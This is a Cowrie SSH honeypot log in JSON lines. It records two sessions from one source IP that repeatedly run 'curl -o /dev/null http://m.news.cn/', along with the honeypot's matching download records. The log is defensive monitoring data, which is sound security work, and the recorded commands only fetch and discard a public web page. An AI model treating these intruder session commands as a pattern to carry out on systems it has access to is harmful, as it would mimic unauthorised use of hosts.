{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.458514Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.459654Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.467871Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.468759Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.471462Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.477476Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.478632Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.482944Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.491514Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.498386Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.499539Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.507697Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.508716Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.539712Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.540739Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.544492Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.545328Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.580852Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.581983Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.584556Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.586243Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.610286Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.621151Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.622522Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.626601Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.628133Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.663502Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.664692Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.668616Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.669340Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.706883Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.708036Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.710415Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.711761Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.715952Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.731558Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.743947Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.745046Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.755030Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.756096Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.773607Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.783596Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.784772Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.788580Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.796772Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.797854Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.821757Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.822786Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.839822Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.840751Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.863136Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.864710Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.866466Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.869962Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.883466Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.884463Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.908078Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.909152Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.932488Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.934567Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.937001Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.938387Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.942170Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.944517Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.968261Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.969632Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.981140Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.982235Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.009038Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.010206Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.022464Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.023543Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.046576Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.051490Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.052794Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.065458Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.066586Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.090083Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.091146Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.108986Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.110058Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.126741Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.127614Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.151215Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.152390Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.159605Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.166159Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.167198Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.189709Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.193086Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.196741Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.197720Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.203720Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.204525Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.238518Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.239630Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.244390Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.245522Z","src_ip":"212.227.125.160","session":"7541ed730449"}
